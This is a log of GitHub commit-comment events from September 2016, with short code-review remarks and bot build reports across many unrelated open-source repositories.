{"id":"4556782447","type":"CommitCommentEvent","actor":{"login":"camdenorrb"},"repo":{"name":"Vinc0682/RankSQL"},"payload":{"comment":{"id":19004666,"position":null,"line":null,"path":null,"commit_id":"f2f1d76ebbaa36d04abad15cd70b33dd054f1a9a","created_at":"2016-09-13T16:36:21Z","updated_at":"2016-09-13T16:36:21Z","body":":3"}},"created_at":"2016-09-13T16:36:21Z"}
{"id":"4556786589","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ghsr/proprietary_vendor_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19004673,"position":null,"line":null,"path":null,"commit_id":"47e446dfed2ba543602e8e962aa0f9a064cd537d","created_at":"2016-09-13T16:37:06Z","updated_at":"2016-09-13T16:37:06Z","body":"@ghsr do you have hotspot working? And WiFi fully working? \r\nI have ported essentials patches already but hotspot not working. And WiFi working unstable.(connect/disconnect frequently)\r\nPatches:- https://github.com/google-aosp?tab=repositories\r\nDevice tree:- https://github.com/ishantvivek/android_device_samsung_kyleprods/tree/n?files=1"}},"created_at":"2016-09-13T16:37:06Z"}
{"id":"4556795802","type":"CommitCommentEvent","actor":{"login":"koujun2012"},"repo":{"name":"quickfix-j/quickfixj"},"payload":{"comment":{"id":19004690,"position":null,"line":null,"path":null,"commit_id":"2c4ad734c214050cdc653897d5276e993746f226","created_at":"2016-09-13T16:38:43Z","updated_at":"2016-09-13T16:38:43Z","body":"where can find 1.6.3's release plan?"}},"created_at":"2016-09-13T16:38:43Z"}
{"id":"4556798866","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004694,"position":55,"line":55,"path":"azure-mgmt-keyvault/src/main/java/com/microsoft/azure/management/keyvault/Vault.java","commit_id":"36616ae219751d14f65f2eb8484e526cd2b09499","created_at":"2016-09-13T16:39:18Z","updated_at":"2016-09-13T16:39:18Z","body":"this should be Boolean, not Boolean"}},"created_at":"2016-09-13T16:39:18Z"}
{"id":"4556800233","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004696,"position":61,"line":61,"path":"azure-mgmt-keyvault/src/main/java/com/microsoft/azure/management/keyvault/Vault.java","commit_id":"36616ae219751d14f65f2eb8484e526cd2b09499","created_at":"2016-09-13T16:39:32Z","updated_at":"2016-09-13T16:39:32Z","body":"boolean"}},"created_at":"2016-09-13T16:39:32Z"}
{"id":"4556800430","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19004697,"position":18,"line":1129,"path":"Data/IntMap/Lazy.hs","commit_id":"1de0fedc47210ee44b43f9e78e4d25b516bd8d63","created_at":"2016-09-13T16:39:34Z","updated_at":"2016-09-13T16:39:34Z","body":"If you pass `f` to `go`, I believe you can avoid scoped type variables without code duplication. The same goes elsewhere."}},"created_at":"2016-09-13T16:39:34Z"}
{"id":"4556802849","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004704,"position":67,"line":67,"path":"azure-mgmt-keyvault/src/main/java/com/microsoft/azure/management/keyvault/Vault.java","commit_id":"36616ae219751d14f65f2eb8484e526cd2b09499","created_at":"2016-09-13T16:40:02Z","updated_at":"2016-09-13T16:40:02Z","body":"boolean"}},"created_at":"2016-09-13T16:40:02Z"}
{"id":"4556803301","type":"CommitCommentEvent","actor":{"login":"Thecakeisgit"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19004707,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T16:40:08Z","updated_at":"2016-09-13T16:40:08Z","body":"Why did you added rem into the array OMG, this might be instable, read the complete code again *-*\r\n"}},"created_at":"2016-09-13T16:40:08Z"}
{"id":"4556805744","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19004710,"position":null,"line":null,"path":null,"commit_id":"96fe40f4e8af3d134afe7e7acaf480f48ebb7d0e","created_at":"2016-09-13T16:40:33Z","updated_at":"2016-09-13T16:40:33Z","body":"Looks good. It's important to maintain a \"clean\" api"}},"created_at":"2016-09-13T16:40:33Z"}
{"id":"4556805924","type":"CommitCommentEvent","actor":{"login":"firm1"},"repo":{"name":"firm1/zest-writer"},"payload":{"comment":{"id":19004711,"position":4,"line":270,"path":"src/main/resources/locales/ui_fr_FR.properties","commit_id":"4d97d7e37c1793a6f8d7b8ef4b3a38c8949d2f13","created_at":"2016-09-13T16:40:35Z","updated_at":"2016-09-13T16:40:35Z","body":"Lol."}},"created_at":"2016-09-13T16:40:35Z"}
{"id":"4556808218","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":19004722,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-13T16:40:58Z","updated_at":"2016-09-13T16:40:58Z","body":"@wluyima Some of the tests related to Cohort are encountering an error:\r\n\r\n`org.dbunit.dataset.NoSuchColumnException: cohort_member.COHORT_MEMBER_ID -  (Non-uppercase input column: COHORT_MEMBER_ID) in ColumnNameToIndexes cache map. Note that the map's column names are NOT case sensitive.`\r\n\r\nSeems to be something trivial. I'll try to fix it and submit the PR."}},"created_at":"2016-09-13T16:40:58Z"}
{"id":"4556808960","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19004728,"position":null,"line":null,"path":null,"commit_id":"6214ff6a608560e6f6b64d7f1f4d016108bfc511","created_at":"2016-09-13T16:41:06Z","updated_at":"2016-09-13T16:41:06Z","body":"https://github.com/6c37/crux-ports/issues/39\r\n\r\nThis footprint error is quite weird, for some people it happens and for others not, probably some optional dependency, but what one, and do we prefer users to have NEW or MISSING footprints?"}},"created_at":"2016-09-13T16:41:06Z"}
{"id":"4556809644","type":"CommitCommentEvent","actor":{"login":"lainys"},"repo":{"name":"Erdenian/StudentAssistant"},"payload":{"comment":{"id":19004730,"position":5,"line":27,"path":"studentassistant/src/main/res/layout/toolbar_university_selection.xml","commit_id":"628a762f7d9f8cf48fc8dbca45e506ff5a09a683","created_at":"2016-09-13T16:41:15Z","updated_at":"2016-09-13T16:41:15Z","body":"саня вернись\r\n"}},"created_at":"2016-09-13T16:41:15Z"}
{"id":"4556812177","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004735,"position":29,"line":29,"path":"azure-mgmt-keyvault/src/main/java/com/microsoft/azure/management/keyvault/Vault.java","commit_id":"36616ae219751d14f65f2eb8484e526cd2b09499","created_at":"2016-09-13T16:41:39Z","updated_at":"2016-09-13T16:41:39Z","body":"we generally start \"@return\" comments in javadocs with a small letter and no period, because they are not sentences. (Only the description has properly capitalized sententences with periods)"}},"created_at":"2016-09-13T16:41:39Z"}
{"id":"4556814056","type":"CommitCommentEvent","actor":{"login":"DanielShlomo"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19004738,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T16:42:00Z","updated_at":"2016-09-13T16:42:00Z","body":"Yeah i corrected it - https://github.com/DanielShlomo/Duckuino/blob/master/js/Duckuino.js"}},"created_at":"2016-09-13T16:42:00Z"}
{"id":"4556816289","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19004749,"position":4,"line":208,"path":"src/main.cpp","commit_id":"7b972305b5a86979b1c634cfda6e6cfede5b1d02","created_at":"2016-09-13T16:42:25Z","updated_at":"2016-09-13T16:42:25Z","body":"Apparently not :open_mouth: "}},"created_at":"2016-09-13T16:42:25Z"}
{"id":"4556817936","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19004751,"position":18,"line":5544,"path":"src/game/SpellEffects.cpp","commit_id":"6fb00d32ebfbfea540c3ca899587737a99e8c378","created_at":"2016-09-13T16:42:43Z","updated_at":"2016-09-13T16:42:43Z","body":"This part is actually only supposed to be called if m_castItem, sorry for not being clear on that; this is a continuation of https://github.com/cmangos/mangos-wotlk/commit/62fe263937398112afef495808b7b81e0ea14d2a\r\n\r\nbasically, we want guardians summoed by spells (the mage's water elemental, the priests shadowfiend, etc) to scale with level, but all guardians summoed by items (target dummies, explosive sheeps, cat figurine, etc) to NOT scale, unless they of course are engineering trinkets (dragonlings, battle chicken, etc)"}},"created_at":"2016-09-13T16:42:43Z"}
{"id":"4556818613","type":"CommitCommentEvent","actor":{"login":"randyhoulahan"},"repo":{"name":"scbd/chm.cbd.int"},"payload":{"comment":{"id":19004752,"position":null,"line":null,"path":null,"commit_id":"24043574ef2ad54825e8ecee0f223d95208f9b4d","created_at":"2016-09-13T16:42:50Z","updated_at":"2016-09-13T16:42:50Z","body":"working"}},"created_at":"2016-09-13T16:42:50Z"}
{"id":"4556822316","type":"CommitCommentEvent","actor":{"login":"Thecakeisgit"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19004759,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T16:43:30Z","updated_at":"2016-09-13T16:43:30Z","body":"xD Thanks :3 What can i add to my principal project ?"}},"created_at":"2016-09-13T16:43:30Z"}
{"id":"4556822729","type":"CommitCommentEvent","actor":{"login":"randyhoulahan"},"repo":{"name":"scbd/chm.cbd.int"},"payload":{"comment":{"id":19004761,"position":null,"line":null,"path":null,"commit_id":"e102d5e2b23c34b0cee24a4865d936492a03b754","created_at":"2016-09-13T16:43:35Z","updated_at":"2016-09-13T16:43:35Z","body":"new link working"}},"created_at":"2016-09-13T16:43:35Z"}
{"id":"4556823497","type":"CommitCommentEvent","actor":{"login":"sunnybear"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19004767,"position":null,"line":null,"path":null,"commit_id":"8bf48ac77d7ba92487ce57a54e1c82bd36168a50","created_at":"2016-09-13T16:43:44Z","updated_at":"2016-09-13T16:43:44Z","body":"nginx building process: get ngx_pagespeed, download PSOL as tar.gz, build ngx_pagespeed was broken by this commit. Maybe you changed ngx_pagespeed build process - and PSOL must be cloned from git. Or some other actions must be applied. But current ngx_pagespeed git is incompatible with PSOL 1.11.33.3"}},"created_at":"2016-09-13T16:43:44Z"}
{"id":"4556830597","type":"CommitCommentEvent","actor":{"login":"Duncaen"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19004775,"position":21,"line":50,"path":"srcpkgs/broadcom-wl-dkms/template","commit_id":"25ff2989de375829526bd89fc71db848a201c880","created_at":"2016-09-13T16:44:56Z","updated_at":"2016-09-13T16:44:56Z","body":"That is useless, its created on the first '>>file'."}},"created_at":"2016-09-13T16:44:56Z"}
{"id":"4556830818","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19004776,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T16:44:58Z","updated_at":"2016-09-13T16:44:58Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2324 of 2332 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T16:44:58Z"}
{"id":"4556832514","type":"CommitCommentEvent","actor":{"login":"jaimecasero"},"repo":{"name":"RestComm/jain-sip"},"payload":{"comment":{"id":19004786,"position":7,"line":138,"path":"src/gov/nist/javax/sip/parser/NioPipelineParser.java","commit_id":"8d6ec69eac370b826f5b68517d9954e5083a2bc6","created_at":"2016-09-13T16:45:18Z","updated_at":"2016-09-13T16:45:18Z","body":"now is correct"}},"created_at":"2016-09-13T16:45:18Z"}
{"id":"4556832966","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004788,"position":9,"line":1,"path":"challenge_4/answer4.rb","commit_id":"8dae70be923c13d4f363003e592cb1e9802ea45a","created_at":"2016-09-13T16:45:22Z","updated_at":"2016-09-13T16:45:22Z","body":"You have to run your code in irb. This will not work \r\n1. variable names MUST start with small letters. \r\n2. when you want to access a value in a hash you CAN NOT have a space between the variable name and the hard brackets."}},"created_at":"2016-09-13T16:45:22Z"}
{"id":"4556834541","type":"CommitCommentEvent","actor":{"login":"randyhoulahan"},"repo":{"name":"scbd/chm.cbd.int"},"payload":{"comment":{"id":19004793,"position":null,"line":null,"path":null,"commit_id":"4579af7236a0fa059b03a844b2038a0394f95944","created_at":"2016-09-13T16:45:39Z","updated_at":"2016-09-13T16:45:39Z","body":"tested"}},"created_at":"2016-09-13T16:45:39Z"}
{"id":"4556837235","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004805,"position":4,"line":24,"path":"challenge_5/answer5.rb","commit_id":"8dae70be923c13d4f363003e592cb1e9802ea45a","created_at":"2016-09-13T16:46:08Z","updated_at":"2016-09-13T16:46:08Z","body":"What is `Funktion:`? "}},"created_at":"2016-09-13T16:46:08Z"}
{"id":"4556840318","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19004815,"position":102,"line":98,"path":"README.md","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T16:46:40Z","updated_at":"2016-09-13T16:46:40Z","body":"\"a\" instead of \"an\""}},"created_at":"2016-09-13T16:46:40Z"}
{"id":"4556844947","type":"CommitCommentEvent","actor":{"login":"DanielShlomo"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19004826,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T16:47:31Z","updated_at":"2016-09-13T16:47:31Z","body":"Sure,  but i'm rewriting the parser/interpreter/compiler to use associative arrays, it will make the compiler much more efficient because you will not need to use all those for loops...\r\nI think i'll get to finish it tomorrow."}},"created_at":"2016-09-13T16:47:31Z"}
{"id":"4556846766","type":"CommitCommentEvent","actor":{"login":"jaimecasero"},"repo":{"name":"RestComm/jain-sip"},"payload":{"comment":{"id":19004830,"position":5,"line":2011,"path":"src/gov/nist/javax/sip/stack/SIPServerTransactionImpl.java","commit_id":"8d6ec69eac370b826f5b68517d9954e5083a2bc6","created_at":"2016-09-13T16:47:48Z","updated_at":"2016-09-13T16:47:48Z","body":"i guess this should happen never, so warning may be helpful. Theorically speaking should be DEBUG as well, it affects a TX, not the overall system..."}},"created_at":"2016-09-13T16:47:48Z"}
{"id":"4556848491","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004835,"position":5,"line":25,"path":"challenge_5/answer5.rb","commit_id":"8dae70be923c13d4f363003e592cb1e9802ea45a","created_at":"2016-09-13T16:48:03Z","updated_at":"2016-09-13T16:48:03Z","body":"Why `self`? \r\nAnd why are you hard coding the response? This method is supposed to return the information about the bkok no matter what the title is and who wrote it. \r\n'Thomas Ochman, Coding As A Craft, Pragmatic Sweden, 2016, 50' in the question is just an EXAMPLE."}},"created_at":"2016-09-13T16:48:03Z"}
{"id":"4556849713","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"rvock/typo3-realurl"},"payload":{"comment":{"id":19004839,"position":5,"line":76,"path":"Classes/Utility.php","commit_id":"5d8ef2632de3af4b7441f04f90b8ecb9a4c0f064","created_at":"2016-09-13T16:48:15Z","updated_at":"2016-09-13T16:48:15Z","body":")x20 is not a non-breaking space."}},"created_at":"2016-09-13T16:48:15Z"}
{"id":"4556849829","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19004840,"position":39,"line":39,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/application/AudioStream.java","commit_id":"249c9149ad0f1c02d27a6eb2f767a8cb083a399c","created_at":"2016-09-13T16:48:16Z","updated_at":"2016-09-13T16:48:16Z","body":"Don't leave these logger calls in the code."}},"created_at":"2016-09-13T16:48:16Z"}
{"id":"4556849967","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19004842,"position":233,"line":262,"path":"README.md","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T16:48:18Z","updated_at":"2016-09-13T16:48:18Z","body":"\"keeps\""}},"created_at":"2016-09-13T16:48:18Z"}
{"id":"4556851595","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004846,"position":4,"line":4,"path":"challenge_6/answer6.rb","commit_id":"8dae70be923c13d4f363003e592cb1e9802ea45a","created_at":"2016-09-13T16:48:35Z","updated_at":"2016-09-13T16:48:35Z","body":"What does 'seperately' mean and why do you want that?"}},"created_at":"2016-09-13T16:48:35Z"}
{"id":"4556855896","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004861,"position":25,"line":25,"path":"challenge_6/App/lib.rb","commit_id":"7f3e7ea155634dd8d960a39da097bf67173717c9","created_at":"2016-09-13T16:49:20Z","updated_at":"2016-09-13T16:49:20Z","body":"What is this file supposed to do? "}},"created_at":"2016-09-13T16:49:20Z"}
{"id":"4556856225","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"devenbansod/phpmyadmin"},"payload":{"comment":{"id":19004862,"position":null,"line":null,"path":null,"commit_id":"379399741f6ce5a4069c88240206159d9a5ff865","created_at":"2016-09-13T16:49:23Z","updated_at":"2016-09-13T16:49:23Z","body":"<!-- PMABOT:TAB -->\nThis commit is using tab character for indentation instead of spaces, what is mandated by phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: test/libraries/PMA_server_privileges_test.php"}},"created_at":"2016-09-13T16:49:23Z"}
{"id":"4556859026","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004868,"position":16,"line":16,"path":"azure-mgmt-graph-rbac/src/main/java/com/microsoft/azure/management/graphrbac/Group.java","commit_id":"fd4ce079a84c662d8a11e23a933fb4d7a33baa4e","created_at":"2016-09-13T16:49:51Z","updated_at":"2016-09-13T16:49:51Z","body":"\"Group\" seems to be too generic of a name. Remember discussion we had in the past about \"Group\" vs ResourceGroup and we settled on qualifying the word \"group\" b/c of multiple different uses. So this sounds like `ActiveDirectoryGroup` (since the inner is `ADGroupInner` --- but we don't want the abbreviation here either)"}},"created_at":"2016-09-13T16:49:51Z"}
{"id":"4556860028","type":"CommitCommentEvent","actor":{"login":"martinsawicki"},"repo":{"name":"Azure/azure-sdk-for-java"},"payload":{"comment":{"id":19004872,"position":36,"line":36,"path":"azure-mgmt-graph-rbac/src/main/java/com/microsoft/azure/management/graphrbac/Group.java","commit_id":"fd4ce079a84c662d8a11e23a933fb4d7a33baa4e","created_at":"2016-09-13T16:50:02Z","updated_at":"2016-09-13T16:50:02Z","body":"boolean"}},"created_at":"2016-09-13T16:50:02Z"}
{"id":"4556864020","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19004883,"position":41,"line":121,"path":"src/pocketmine/level/ChunkManager.php","commit_id":"e57a7e7bafdcd74e7962b59f5ac2e889e05787e5","created_at":"2016-09-13T16:50:43Z","updated_at":"2016-09-13T16:50:43Z","body":"hmm?"}},"created_at":"2016-09-13T16:50:43Z"}
{"id":"4556864786","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19004888,"position":null,"line":null,"path":null,"commit_id":"7f3e7ea155634dd8d960a39da097bf67173717c9","created_at":"2016-09-13T16:50:51Z","updated_at":"2016-09-13T16:50:51Z","body":"`App` is not a good folder name. We always want to use lower case in folder names"}},"created_at":"2016-09-13T16:50:51Z"}
{"id":"4556865655","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19004892,"position":51,"line":26,"path":"src/array.jl","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T16:51:00Z","updated_at":"2016-09-13T16:51:00Z","body":"Did you try uncommenting this constructor out? Still segfaulty?"}},"created_at":"2016-09-13T16:51:00Z"}
{"id":"4556870786","type":"CommitCommentEvent","actor":{"login":"alexander-mead"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":19004903,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-13T16:51:52Z","updated_at":"2016-09-13T16:51:52Z","body":"Hi Antony,\n\nI just checked and I only get the error with gfortran, and not with ifort.\nI also only get the error if I turn the 'ihm' option to '1', which makes\nthe halo-model part of the code verbose.\n\nAny ideas?\n\nAlex\n\nOn 13 September 2016 at 01:28, Antony Lewis <notifications@github.com>\nwrote:\n\n> I can't see any reason why that loop would not be thread safe, can you? Do\n> you get the same problem with both gfortran and ifort?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cmbant/CAMB/commit/3018e4b073afb4cd1038e6110417321dbec85d2e#commitcomment-18997709>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIt64Q-WeMW_-Veq4rEvQXC2eRJM80p0ks5qpl69gaJpZM4J0HEx>\n> .\n>\n"}},"created_at":"2016-09-13T16:51:52Z"}
{"id":"4556872389","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19004908,"position":18,"line":5544,"path":"src/game/SpellEffects.cpp","commit_id":"6fb00d32ebfbfea540c3ca899587737a99e8c378","created_at":"2016-09-13T16:52:11Z","updated_at":"2016-09-13T16:52:11Z","body":"Ah, thanks for clarify. I misundestand code.  cInfo related to summoned creature. )"}},"created_at":"2016-09-13T16:52:11Z"}
{"id":"4556881578","type":"CommitCommentEvent","actor":{"login":"Thecakeisgit"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19004929,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T16:53:48Z","updated_at":"2016-09-13T16:53:48Z","body":"Good idea, i'll see this ^^ "}},"created_at":"2016-09-13T16:53:48Z"}
{"id":"4556881675","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19004931,"position":null,"line":null,"path":null,"commit_id":"6cd26e001e036781827731b743416261b0bf6eb0","created_at":"2016-09-13T16:53:49Z","updated_at":"2016-09-13T16:53:49Z","body":"The following doc(s) have been deployed to the [1823planc](https://1823planc-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/platform-resources](https://1823planc-static-docs.pantheonsite.io/docs/platform-resources)\n- [source/_views/doc.html](https://github.com/pantheon-systems/documentation/commit/4601ec62dd88ff6fdfb3d7997604d9f4858b9e27/source/_views/doc.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/4601ec62dd88ff6fdfb3d7997604d9f4858b9e27/source/docs/assets/css/main.css)\n"}},"created_at":"2016-09-13T16:53:49Z"}
{"id":"4556886202","type":"CommitCommentEvent","actor":{"login":"pupapaik"},"repo":{"name":"tcpcloud/salt-formula-sensu"},"payload":{"comment":{"id":19004949,"position":217,"line":217,"path":"sensu/files/plugins/handlers/notification/sfdc.py","commit_id":"cca98e987c3b28e874237a077f849f605a4974c0","created_at":"2016-09-13T16:54:39Z","updated_at":"2016-09-13T16:54:39Z","body":"Because it is sensu handler syntax. I can check it @cznewt "}},"created_at":"2016-09-13T16:54:39Z"}
{"id":"4556887138","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"nalimilan/CategoricalArrays.jl"},"payload":{"comment":{"id":19004957,"position":33,"line":14,"path":"src/typedefs.jl","commit_id":"d32441a21946a7e48c1c6f81e81b105c2d092426","created_at":"2016-09-13T16:54:49Z","updated_at":"2016-09-13T16:54:49Z","body":"Any strong reasons why you put `isordered` as a field instead of a type parameter? I was originally thinking it could be something useful to dispatch on for certain code."}},"created_at":"2016-09-13T16:54:49Z"}
{"id":"4556888775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19004966,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T16:55:07Z","updated_at":"2016-09-13T16:55:07Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2358 of 2366 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T16:55:07Z"}
{"id":"4556892884","type":"CommitCommentEvent","actor":{"login":"teosarca"},"repo":{"name":"metasfresh/metasfresh"},"payload":{"comment":{"id":19004985,"position":null,"line":null,"path":null,"commit_id":"95f03fb51dc40b629f7a0cce04bf5ee137d95b85","created_at":"2016-09-13T16:55:49Z","updated_at":"2016-09-13T16:55:49Z","body":"this commit is also related to \tFRESH-657 #16"}},"created_at":"2016-09-13T16:55:49Z"}
{"id":"4556894375","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19004988,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T16:56:07Z","updated_at":"2016-09-13T16:56:07Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T16:56:07Z"}
{"id":"4556895454","type":"CommitCommentEvent","actor":{"login":"weidendo"},"repo":{"name":"lrr-tum/dbrew"},"payload":{"comment":{"id":19004991,"position":null,"line":null,"path":null,"commit_id":"a31a140b9f80eb424585f05580ef2caee7309ab3","created_at":"2016-09-13T16:56:19Z","updated_at":"2016-09-13T16:56:19Z","body":"An XMM register always has a width of 128 bit, so %xmm1 is {RT_XMM,1}.\r\n\r\nWhether an instruction only accesses part of an XMM register is not specified with that, but\r\nas before with Instr.vt set to VT_32 or VT_64 (or if the width is known due to a specific\r\ninstruction type by VT_Implicit).\r\n"}},"created_at":"2016-09-13T16:56:19Z"}
{"id":"4556896367","type":"CommitCommentEvent","actor":{"login":"faho"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19004994,"position":null,"line":null,"path":null,"commit_id":"f41b8fe8ade0c368ec835fa56106540d63277bc6","created_at":"2016-09-13T16:56:28Z","updated_at":"2016-09-13T16:56:28Z","body":"Sorry, this will be much slower (since it forks off bc for every math call).\r\n\r\nYour first solution was actually better."}},"created_at":"2016-09-13T16:56:28Z"}
